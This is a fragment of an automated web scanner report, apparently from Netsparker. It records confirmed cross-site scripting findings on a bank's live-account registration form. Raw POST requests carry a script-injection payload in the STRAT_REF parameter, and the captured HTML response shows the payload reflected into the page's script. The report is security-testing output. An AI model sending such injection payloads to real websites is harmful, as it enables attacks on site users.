&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot;  onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00010E)&lt;/script&gt;&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;1&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;3&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BSTRAT_REF%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000111)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 300
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000111)%3c%2fscript%3e&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=2&amp;aData%5BaccountKind%5D=200&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:25:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
